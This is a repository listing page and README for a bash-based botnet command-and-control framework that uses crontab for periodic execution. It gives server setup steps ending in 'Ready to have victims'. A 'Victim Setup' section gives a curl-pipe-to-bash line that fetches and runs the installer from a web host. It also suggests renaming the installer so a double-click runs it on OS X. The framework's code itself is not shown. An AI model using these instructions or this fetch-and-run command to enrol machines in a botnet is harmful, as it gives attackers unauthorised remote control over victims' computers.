https://github.com/seadog007/crontab_botnet
A botnet (C&C) framework that create in bash and using crontab for periodic execute
https://github.com/seadog007/crontab_botnet
botnet c2 command-and-control crontab security
Last synced: 10 months ago
JSON representation
A botnet (C&C) framework that create in bash and using crontab for periodic execute
- Host: GitHub
- URL: https://github.com/seadog007/crontab_botnet
- Owner: seadog007
- License: mit
- Created: 2017-08-16T14:52:57.000Z (almost 9 years ago)
- Default Branch: master
- Last Pushed: 2017-08-17T23:13:18.000Z (almost 9 years ago)
- Last Synced: 2025-08-22T07:54:20.701Z (10 months ago)
- Topics: botnet, c2, command-and-control, crontab, security
- Language: Shell
- Size: 4.88 KB
- Stars: 11
- Watchers: 2
- Forks: 8
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# crontab_botnet
A botnet (C&C) framework that create in bash and using crontab for periodic execute
## Server Side Setup (Plain Text Version)
1. Put the folder under any kind of web server, which can be, but not limited to:
```
IIS
Nginx
Apache
Python Simple HTTP Server
```
2. Change the domain and path in `install.sh` and `bd.sh`.
3. follow the instrustion for writing a command file
4. Ready to have victims
## Server Side Setup (With PHP uploader)
1. Setup a LAMP server.
2. Put the file to a folder which can be accessed on the network.
3. Change the domain and path in `install.sh` and `bd.sh`.
4. follow the instrustion for writing a command file
5. Ready to have victims
## Victim Setup
- `curl http://example.com/install.sh | bash`
- You can also rename the file install.sh to install.command, and double-click the file on OS X system to execute it.
## Command File
The name of command file is `command_list`, there is a simple command list call `command_list_example`.
You can change the domain and path in the example file, and feel free to use it.